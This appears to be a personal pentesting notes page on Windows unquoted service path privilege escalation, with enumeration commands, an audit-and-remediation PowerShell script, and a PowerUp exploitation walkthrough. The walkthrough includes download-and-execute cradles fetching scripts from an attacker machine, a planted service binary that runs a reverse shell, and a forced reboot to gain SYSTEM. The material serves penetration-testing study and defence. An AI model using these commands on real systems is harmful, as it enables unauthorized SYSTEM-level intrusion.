yuyudhn's notes
Unquoted Service Path

Unquoted Service Paths – Windows Privilege Escalation


Last updated 6 months ago


In simple terms, when a service is created whose executable path contains spaces and isn't enclosed in quotes, the result is a vulnerability known as Unquoted Service Path: Windows tries each space-delimited prefix of the path as a candidate executable before the real one, so a file planted at one of those locations runs in the service's context. This allows a user to gain SYSTEM privileges (only if the vulnerable service runs with SYSTEM privileges, which most of the time it does).

Manual Checks

Check service without quotes:

Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl

Check File or Directory Permissions:

Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl

Check Service Permissions:

Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *
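The three manual checks above can be combined into one audit. The script below is an added example written for these notes, not code from the original page or from PowerUp: it lists services whose path is unquoted and contains a space, expands the candidate locations Windows would search before the real binary, flags candidates whose parent directory grants write-type rights to broad groups (Everyone, Users, Authenticated Users), and offers a remediation that quotes the ImagePath. The function names, the list of broad principals, and the assumption that it is run as an administrator on Windows PowerShell 5.1 or PowerShell 7 are mine.

```powershell
# Added example (not part of the original notes): audit and remediate unquoted
# service paths. Assumes Windows, CIM cmdlets available, run as administrator.

# Principals whose write access on a search directory is a finding (assumption: adjust per environment).
$BroadPrincipals = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$WriteRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-ServiceExecutable {
    # Return only the executable part of "C:\dir with space\svc.exe -k arg".
    param([string]$PathName)
    if ($PathName -match '^(?<exe>.+?\.exe)(\s.*)?$') { return $Matches.exe }
    return $PathName
}

function Get-SearchCandidates {
    # For each space in the unquoted path, Windows tries "<prefix>.exe" first,
    # e.g. C:\Program.exe, then C:\Program Files.exe, and so on.
    param([string]$Exe)
    $tokens = $Exe -split ' '
    $out = @()
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        $out += (($tokens[0..($i - 1)] -join ' ') + '.exe')
    }
    return $out
}

function Test-BroadWriteAccess {
    # True if the directory ACL grants a write-type right to one of $BroadPrincipals.
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteRights) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    # One object per unquoted service path containing a space; WritableCandidate
    # lists the search locations whose parent directory is broadly writable.
    [CmdletBinding()]
    param()
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' -and $_.PathName -notlike 'C:\Windows\*' } |
        ForEach-Object {
            $exe = Get-ServiceExecutable $_.PathName
            if ($exe -notmatch ' ') { return }   # no space: nothing for CreateProcess to misparse
            $candidates = Get-SearchCandidates $exe
            $writable = @($candidates | Where-Object { Test-BroadWriteAccess (Split-Path -Parent $_) })
            [pscustomobject]@{
                Name              = $_.Name
                StartMode         = $_.StartMode
                RunAs             = $_.StartName
                PathName          = $_.PathName
                SearchCandidates  = $candidates
                WritableCandidate = $writable
            }
        }
}

function Repair-UnquotedServicePath {
    # Remediation: wrap the executable in quotes in the service's ImagePath,
    # keeping any arguments. Supports -WhatIf so the change can be previewed.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Name)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $path = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    $exe = Get-ServiceExecutable $path
    $argPart = $path.Substring($exe.Length)
    $fixed = "`"$exe`"$argPart"
    if ($PSCmdlet.ShouldProcess($Name, "Set ImagePath to $fixed")) {
        Set-ItemProperty -Path $key -Name ImagePath -Value $fixed
    }
    return $fixed
}

# Usage (service name below is the one from these notes):
# Get-UnquotedServicePath | Format-List
# Repair-UnquotedServicePath -Name IObitUnSvr -WhatIf
```

The ACL test deliberately checks only broad groups rather than the current user, so the report reads the same whoever runs it; a finding with a non-empty WritableCandidate is the combination (unquoted path plus writable search directory) that actually matters, and Repair-UnquotedServicePath removes the first half of that combination without touching directory permissions.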

Unquoted Service Path with PowerUp

First, import PowerUp.ps1 to memory.

iex ((New-Object Net.WebClient).DownloadString('http://192.168.45.243/OSEP/powershell/PowerUp.ps1'))

Then, check for privilege escalation vectors using this command:

Invoke-AllChecks | fl

Alternatively, for checking unquoted service paths specifically, use this command:

Get-UnquotedService | fl

Example output: (screenshot in the original page)

For detailed information about the vulnerable service, use this command:

Get-ServiceDetail -Name IObitUnSvr | Select-object *

Now, to abuse the service, you can use the Write-ServiceBinary command:

Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "powershell iex ((New-Object Net.WebClient).DownloadString('http://kali-machine/revshell.ps1'))" | fl

Basically, the above command replaces the original binary with a malicious file that contains a reverse shell command.

If you have the ability to restart the service, you can run:

Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'

But if, as here, you don't have the privilege to restart the service (CanRestart = False), you can reboot the machine instead, since the service is set to autostart.

shutdown -r -t 0

Now, your netcat listener will have a session as the NT AUTHORITY\SYSTEM user.
